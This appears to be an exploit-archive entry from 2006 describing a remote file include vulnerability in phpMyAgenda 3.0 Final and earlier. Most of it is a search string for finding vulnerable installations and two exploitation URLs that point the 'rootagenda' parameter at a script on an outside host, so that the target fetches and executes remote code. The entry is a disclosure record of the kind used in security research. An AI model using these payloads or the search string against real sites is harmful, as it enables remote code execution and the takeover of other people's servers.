id: 386
date: 04/29/2006
title: phpMyAgenda <= 3.0 Final (rootagenda) Remote Include Vulnerability
author: Aesthetico
cves: 

==================================================================
phpMyAgenda <= 3.0 Final (rootagenda) Remote Include Vulnerability
==================================================================





Title: phpMyAgenda <=3.0 Final - Remote File Include Vulnerability
-----------------------------------------------------------------
Vendor: phpMyAgenda
URL: http://phpmyagenda.com
-----------------------------------------------------------------

Credits:
Discovered by: 'Aesthetico'
http://www.majorsecurity.de
-----------------------------------------------------------------
Search for: "Powered by phpMyAgenda"
-----------------------------------------------------------------

Exploitation:

/agenda.php3?rootagenda=http://www.yourspace.com/yourscript.php?
/agenda2.php3?rootagenda=http://www.yourspace.com/yourscript.txt?



#  0day.today [2023-03-24]  #